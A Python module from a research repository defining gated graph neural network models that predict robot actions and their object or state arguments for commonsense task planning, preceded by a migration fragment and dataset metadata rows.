('\u041f\u0440\u0430\u0432\u043e\u0432\u043b\u0430\u0441\u043d\u0438\u043a', '\u041f\u0440\u0430\u0432\u043e\u0432\u043b\u0430\u0441\u043d\u0438\u043a'), ('\u041c\u0430\u0442\u0435\u0440\u0438\u043d\u0441\u044c\u043a\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0456\u044f', '\u041c\u0430\u0442\u0435\u0440\u0438\u043d\u0441\u044c\u043a\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0456\u044f'), ('\u0414\u043e\u0447\u0456\u0440\u043d\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0456\u044f', '\u0414\u043e\u0447\u0456\u0440\u043d\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0456\u044f'), ('\u0427\u043b\u0435\u043d \u043d\u0430\u0433\u043b\u044f\u0434\u043e\u0432\u043e\u0433\u043e \u043e\u0440\u0433\u0430\u043d\u0443)', '\u0427\u043b\u0435\u043d \u043d\u0430\u0433\u043b\u044f\u0434\u043e\u0432\u043e\u0433\u043e \u043e\u0440\u0433\u0430\u043d\u0443)')]),
),
]
| 179.526316 | 3,569 | 0.735855 | 979 | 6,822 | 5.099081 | 0.122574 | 0.044071 | 0.060096 | 0.028045 | 0.611178 | 0.595954 | 0.583934 | 0.56891 | 0.555889 | 0.545873 | 0 | 0.48236 | 0.073439 | 6,822 | 37 | 3,570 | 184.378378 | 0.307388 | 0.003078 | 0 | 0.064516 | 0 | 1.16129 | 0.771437 | 0.72643 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.096774 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2862401fb1161e467c808fad23b4a2967ee94915 | 51,486 | py | Python | src/GNN/action_models.py | reail-iitd/commonsense-task-planning | 6a6d1599bcad2e4ee11d5d07bf4262a8255caad0 | [
"BSD-2-Clause"
] | 10 | 2020-07-05T19:53:31.000Z | 2022-02-28T08:17:56.000Z | src/GNN/action_models.py | reail-iitd/commonsense-task-planning | 6a6d1599bcad2e4ee11d5d07bf4262a8255caad0 | [
"BSD-2-Clause"
] | 3 | 2021-06-08T21:49:50.000Z | 2022-03-12T00:35:54.000Z | src/GNN/action_models.py | reail-iitd/commonsense-task-planning | 6a6d1599bcad2e4ee11d5d07bf4262a8255caad0 | [
"BSD-2-Clause"
] | 4 | 2020-09-29T15:36:31.000Z | 2021-08-10T14:50:41.000Z | from src.GNN.helper import *
from src.GNN.CONSTANTS import *
from src.utils import *
from src.GNN.oldmodels import *
torch.manual_seed(1)
# Contains the action prediction task models. Will be released in a future publication.
def action2vec(action, num_objects, num_states):
actionArray = torch.zeros(len(possibleActions))
actionArray[possibleActions.index(action['name'])] = 1
predicate1 = torch.zeros(num_objects+1)
#predicate 2 and 3 will be predicted together
predicate2 = torch.zeros(num_objects+1)
predicate3 = torch.zeros(num_states)
if len(action['args']) == 0:
predicate1[-1] = 1
predicate2[-1] = 1
elif len(action['args']) == 1:
predicate1[object2idx[action['args'][0]]] = 1
predicate2[-1] = 1
else:
# action['args'][1] can be a state or an object
if action['args'][1] in object2idx:
predicate1[object2idx[action['args'][0]]] = 1
predicate2[object2idx[action['args'][1]]] = 1
else:
predicate1[object2idx[action['args'][0]]] = 1
predicate3[possibleStates.index(action['args'][1])] = 1
return torch.cat((actionArray, predicate1, predicate2, predicate3), 0)
def action2ids(action, num_objects, num_states):
actionID = possibleActions.index(action['name'])
predicate1, predicate2 = 0, 0
if len(action['args']) == 0:
predicate1 = num_objects+1
predicate2 = num_objects+1
elif len(action['args']) == 1:
predicate1 = object2idx[action['args'][0]]
predicate2 = num_objects+1
else:
# action['args'][1] can be a state or an object
if action['args'][1] in object2idx:
predicate1 = object2idx[action['args'][0]]
predicate2 = object2idx[action['args'][1]]
else:
predicate1 = object2idx[action['args'][0]]
predicate2 = num_objects + 1 + possibleStates.index(action['args'][1])
return actionID, predicate1, predicate2
def vec2action(vec, num_objects, num_states, idx2object):
ret_action = {}
action_array = list(vec[:len(possibleActions)])
ret_action["name"] = possibleActions[action_array.index(max(action_array))]
ret_action["args"] = []
object1_array = list(vec[len(possibleActions):len(possibleActions)+num_objects+1])
object1_ind = object1_array.index(max(object1_array))
if object1_ind == len(object1_array) - 1:
return ret_action
else:
ret_action["args"].append(idx2object[object1_ind])
object2_or_state_array = list(vec[len(possibleActions)+num_objects+1:])
object2_or_state_ind = object2_or_state_array.index(max(object2_or_state_array))
if (object2_or_state_ind < num_objects):
ret_action["args"].append(idx2object[object2_or_state_ind])
elif (object2_or_state_ind == num_objects):
pass
else:
ret_action["args"].append(possibleStates[object2_or_state_ind - num_objects - 1])
return ret_action
def vec2action_grammatical(vec, num_objects, num_states, idx2object):
ret_action = {}
action_array = list(vec[:len(possibleActions)])
ret_action["name"] = possibleActions[action_array.index(max(action_array))]
ret_action["args"] = []
object1_array = list(vec[len(possibleActions):len(possibleActions)+num_objects+1])
object1_ind = object1_array.index(max(object1_array))
if object1_ind == len(object1_array) - 1:
# return ret_action
# Removing the case in which zero objects are predicted
object1_array = list(vec[len(possibleActions):len(possibleActions)+num_objects])
object1_ind = object1_array.index(max(object1_array))
ret_action["args"].append(idx2object[object1_ind])
else:
ret_action["args"].append(idx2object[object1_ind])
if ret_action["name"] in ["moveTo", "pick", "climbUp", "climbDown", "clean"]:
return ret_action
object2_array = list(vec[len(possibleActions)+num_objects+1:len(possibleActions)+num_objects+1+num_objects])
state_array = list(vec[len(possibleActions)+num_objects+1+num_objects+1:])
assert len(state_array) == len(possibleStates)
if ret_action["name"] == "changeState":
ret_action["args"].append(possibleStates[state_array.index(max(state_array))])
else:
ret_action["args"].append(idx2object[object2_array.index(max(object2_array))])
return ret_action
# object2_or_state_array = list(vec[len(possibleActions)+num_objects+1:])
# object2_or_state_ind = object2_or_state_array.index(max(object2_or_state_array))
# if (object2_or_state_ind < num_objects):
# ret_action["args"].append(idx2object[object2_or_state_ind])
# elif (object2_or_state_ind == num_objects):
# pass
# else:
# ret_action["args"].append(possibleStates[object2_or_state_ind - num_objects - 1])
return ret_action
def tool2object_likelihoods(num_objects, tool_likelihoods):
object_likelihoods = torch.zeros(num_objects)
for i, tool in enumerate(TOOLS2):
object_likelihoods[object2idx[tool]] = tool_likelihoods[i]
return object_likelihoods
#############################################################################
class DGL_AGCN_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(DGL_AGCN_Action, self).__init__()
self.name = "GatedHeteroRGCN_Attention_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Linear(n_hidden + n_hidden, 1)
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
def forward(self, g, goalVec, goalObjectsVec):
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1)], 1)
attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
# print(attn_weights)
scene_embedding = torch.mm(attn_weights.t(), h)
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred1 = self.activation(self.p1(final_to_decode))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(final_to_decode))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
return torch.cat((action, pred1, pred2), 1).flatten()
class GGCN_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(GGCN_Action, self).__init__()
self.name = "GGCN_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Linear(n_hidden + n_hidden, 1)
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
def forward(self, g, goalVec, goalObjectsVec):
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
scene_embedding = torch.sum(h, dim=0).view(1,-1)
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred1 = self.activation(self.p1(final_to_decode))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(final_to_decode))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
return torch.cat((action, pred1, pred2), 1).flatten()
class GGCN_metric_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(GGCN_metric_Action, self).__init__()
self.name = "GGCN_metric_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Linear(n_hidden + n_hidden, 1)
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
self.metric1 = nn.Linear(in_feats, n_hidden)
self.metric2 = nn.Linear(n_hidden, n_hidden)
def forward(self, g, goalVec, goalObjectsVec):
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
metric_part = g.ndata['feat']
metric_part = self.activation(self.metric1(metric_part))
metric_part = self.activation(self.metric2(metric_part))
h = torch.cat([h, metric_part], dim = 1)
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
scene_embedding = torch.sum(h, dim=0).view(1,-1)
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred1 = self.activation(self.p1(final_to_decode))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(final_to_decode))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
return torch.cat((action, pred1, pred2), 1).flatten()
class GGCN_metric_att_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(GGCN_metric_att_Action, self).__init__()
self.name = "GGCN_metric_att_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Linear(n_hidden + n_hidden + n_hidden, 1)
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
self.metric1 = nn.Linear(in_feats, n_hidden)
self.metric2 = nn.Linear(n_hidden, n_hidden)
def forward(self, g, goalVec, goalObjectsVec):
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
metric_part = g.ndata['feat']
metric_part = self.activation(self.metric1(metric_part))
metric_part = self.activation(self.metric2(metric_part))
h = torch.cat([h, metric_part], dim = 1)
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1)], 1)
attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
scene_embedding = torch.mm(attn_weights.t(), h)
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred1 = self.activation(self.p1(final_to_decode))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(final_to_decode))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
return torch.cat((action, pred1, pred2), 1).flatten()
class GGCN_metric_att_aseq_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(GGCN_metric_att_aseq_Action, self).__init__()
self.name = "GGCN_metric_att_aseq_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden), nn.Linear(n_hidden, 1))
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.p2 = nn.Linear(n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.q2 = nn.Linear(n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
self.metric1 = nn.Linear(in_feats, n_hidden)
self.metric2 = nn.Linear(n_hidden, n_hidden)
self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
self.n_hidden = n_hidden
self.n_objects = n_objects
self.n_states = n_states
def forward(self, g_list, goalVec, goalObjectsVec, a_list):
a_list = [action2vec(i, self.n_objects, self.n_states) for i in a_list]
predicted_actions = []
lstm_hidden = (torch.randn(1, 1, self.n_hidden),torch.randn(1, 1, self.n_hidden))
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
for ind,g in enumerate(g_list):
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
metric_part = g.ndata['feat']
metric_part = self.activation(self.metric1(metric_part))
metric_part = self.activation(self.metric2(metric_part))
h = torch.cat([h, metric_part], dim = 1)
if (ind != 0):
lstm_out, lstm_hidden = self.action_lstm(a_list[ind-1].view(1,1,-1), lstm_hidden)
else:
lstm_out = torch.zeros(1, 1, self.n_hidden)
lstm_out = lstm_out.view(-1)
attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1)], 1)
attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
scene_embedding = torch.mm(attn_weights.t(), h)
final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1,-1)], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred1 = self.activation(self.p1(final_to_decode))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(final_to_decode))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
predicted_actions.append(torch.cat((action, pred1, pred2), 1).flatten())
return predicted_actions
# class GGCN_metric_att_aseq_auto_Action(nn.Module):
# def __init__(self,
# in_feats,
# n_objects,
# n_hidden,
# n_states,
# n_layers,
# etypes,
# activation,
# dropout):
# super(GGCN_metric_att_aseq_auto_Action, self).__init__()
# self.name = "GGCN_metric_att_aseq_auto_Action_" + str(n_hidden) + "_" + str(n_layers)
# self.layers = nn.ModuleList()
# self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
# for i in range(n_layers - 1):
# self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
# self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden), nn.Linear(n_hidden, 1))
# self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
# self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
# self.fc2 = nn.Linear(n_hidden, n_hidden)
# self.fc3 = nn.Linear(n_hidden, len(possibleActions))
# self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + len(possibleActions), n_hidden + n_hidden)
# self.p2 = nn.Linear(n_hidden + n_hidden, n_hidden)
# self.p3 = nn.Linear(n_hidden, n_objects+1)
# self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + len(possibleActions), n_hidden + n_hidden)
# self.q2 = nn.Linear(n_hidden + n_hidden, n_hidden)
# self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
# self.activation = nn.LeakyReLU()
# self.metric1 = nn.Linear(in_feats, n_hidden)
# self.metric2 = nn.Linear(n_hidden, n_hidden)
# self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
# self.n_hidden = n_hidden
# self.n_objects = n_objects
# self.n_states = n_states
# def forward(self, g_list, goalVec, goalObjectsVec, a_list):
# a_list = [action2vec(i, self.n_objects, self.n_states) for i in a_list]
# predicted_actions = []
# lstm_hidden = (torch.randn(1, 1, self.n_hidden),torch.randn(1, 1, self.n_hidden))
# goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
# goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
# for ind,g in enumerate(g_list):
# h = g.ndata['feat']
# for i, layer in enumerate(self.layers):
# h = layer(g, h)
# metric_part = g.ndata['feat']
# metric_part = self.activation(self.metric1(metric_part))
# metric_part = self.activation(self.metric2(metric_part))
# h = torch.cat([h, metric_part], dim = 1)
# if (ind != 0):
# lstm_out, lstm_hidden = self.action_lstm(a_list[ind-1].view(1,1,-1), lstm_hidden)
# else:
# lstm_out = torch.zeros(1, 1, self.n_hidden)
# lstm_out = lstm_out.view(-1)
# attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1)], 1)
# attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
# scene_embedding = torch.mm(attn_weights.t(), h)
# final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1,-1)], 1)
# action = self.activation(self.fc1(final_to_decode))
# action = self.activation(self.fc2(action))
# action = self.activation(self.fc3(action))
# action = F.softmax(action, dim=1)
# pred1 = self.activation(self.p1(torch.cat([final_to_decode, action], 1)))
# pred1 = self.activation(self.p2(pred1))
# pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
# pred2 = self.activation(self.q1(torch.cat([final_to_decode, action], 1)))
# pred2 = self.activation(self.q2(pred2))
# pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
# predicted_actions.append(torch.cat((action, pred1, pred2), 1).flatten())
# return predicted_actions
class GGCN_metric_att_aseq_auto_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(GGCN_metric_att_aseq_auto_Action, self).__init__()
self.name = "GGCN_metric_att_aseq_auto_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden), nn.Linear(n_hidden, 1))
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + len(possibleActions), n_hidden + n_hidden)
self.p2 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.p3 = nn.Linear(n_hidden, n_objects+1)
self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + len(possibleActions), n_hidden + n_hidden)
self.q2 = nn.Linear(n_hidden + n_hidden, n_hidden)
self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
self.activation = nn.LeakyReLU()
self.metric1 = nn.Linear(in_feats, n_hidden)
self.metric2 = nn.Linear(n_hidden, n_hidden)
self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
self.n_hidden = n_hidden
self.n_objects = n_objects
self.n_states = n_states
def forward(self, g_list, goalVec, goalObjectsVec, a_list):
a_list = [action2vec(i, self.n_objects, self.n_states) for i in a_list]
predicted_actions = []
lstm_hidden = (torch.randn(1, 1, self.n_hidden),torch.randn(1, 1, self.n_hidden))
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
for ind,g in enumerate(g_list):
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
metric_part = g.ndata['feat']
metric_part = self.activation(self.metric1(metric_part))
metric_part = self.activation(self.metric2(metric_part))
h = torch.cat([h, metric_part], dim = 1)
if (ind != 0):
lstm_out, lstm_hidden = self.action_lstm(a_list[ind-1].view(1,1,-1), lstm_hidden)
else:
lstm_out = torch.zeros(1, 1, self.n_hidden)
lstm_out = lstm_out.view(-1)
attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1)], 1)
attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
scene_embedding = torch.mm(attn_weights.t(), h)
final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1,-1)], 1)
action = self.activation(self.fc1(final_to_decode))
action = self.activation(self.fc2(action))
action = self.activation(self.fc3(action))
action = F.softmax(action, dim=1)
pred_action_values = list(action[0])
ind_max_action = pred_action_values.index(max(pred_action_values))
one_hot_action = [0 for i in range(len(pred_action_values))]; one_hot_action[ind_max_action] = 1
one_hot_action = torch.Tensor(one_hot_action).view(1,-1)
pred1 = self.activation(self.p1(torch.cat([final_to_decode, one_hot_action], 1)))
pred1 = self.activation(self.p2(pred1))
pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
pred2 = self.activation(self.q1(torch.cat([final_to_decode, one_hot_action], 1)))
pred2 = self.activation(self.q2(pred2))
pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
predicted_actions.append(torch.cat((action, pred1, pred2), 1).flatten())
return predicted_actions
class GGCN_metric_att_aseq_L_Action(nn.Module):
def __init__(self,
in_feats,
n_objects,
n_hidden,
n_states,
n_layers,
etypes,
activation,
dropout):
super(GGCN_metric_att_aseq_L_Action, self).__init__()
self.name = "GGCN_metric_att_aseq_L_Action_" + str(n_hidden) + "_" + str(n_layers)
self.layers = nn.ModuleList()
self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
for i in range(n_layers - 1):
self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden), nn.Linear(n_hidden, 1))
self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
self.fc1 = nn.Linear(n_hidden*4, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, len(possibleActions))
self.p1_object = nn.Linear(n_hidden*5, n_hidden)
self.p2_object = nn.Linear(n_hidden, n_hidden)
self.p3_object = nn.Linear(n_hidden, 1)
self.p1_no_object = nn.Linear(n_hidden*4, n_hidden)
self.p2_no_object = nn.Linear(n_hidden, n_hidden)
self.p3_no_object = nn.Linear(n_hidden, 1)
self.q1_object = nn.Linear(n_hidden*5, n_hidden)
self.q2_object = nn.Linear(n_hidden, n_hidden)
self.q3_object = nn.Linear(n_hidden, 1)
self.q1_no_object = nn.Linear(n_hidden*4, n_hidden)
self.q2_no_object = nn.Linear(n_hidden, n_hidden)
self.q3_no_object = nn.Linear(n_hidden, 1)
self.q1_state = nn.Linear(n_hidden*4, n_hidden)
self.q2_state = nn.Linear(n_hidden, n_hidden)
self.q3_state = nn.Linear(n_hidden, n_states)
self.activation = nn.LeakyReLU()
self.metric1 = nn.Linear(in_feats, n_hidden)
self.metric2 = nn.Linear(n_hidden, n_hidden)
self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
self.n_hidden = n_hidden
self.n_objects = n_objects
self.n_states = n_states
l = []
for i in range(n_objects):
l.append(object2vec[idx2object[i]])
self.object_vec = torch.Tensor(l)
def forward(self, g_list, goalVec, goalObjectsVec, a_list):
a_list = [action2vec(i, self.n_objects, self.n_states) for i in a_list]
predicted_actions = []
lstm_hidden = (torch.randn(1, 1, self.n_hidden),torch.randn(1, 1, self.n_hidden))
goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
for ind,g in enumerate(g_list):
h = g.ndata['feat']
for i, layer in enumerate(self.layers):
h = layer(g, h)
metric_part = g.ndata['feat']
metric_part = self.activation(self.metric1(metric_part))
metric_part = self.activation(self.metric2(metric_part))
h = torch.cat([h, metric_part], dim = 1)
if (ind != 0):
lstm_out, lstm_hidden = self.action_lstm(a_list[ind-1].view(1,1,-1), lstm_hidden)
else:
lstm_out = torch.zeros(1, 1, self.n_hidden)
lstm_out = lstm_out.view(-1)
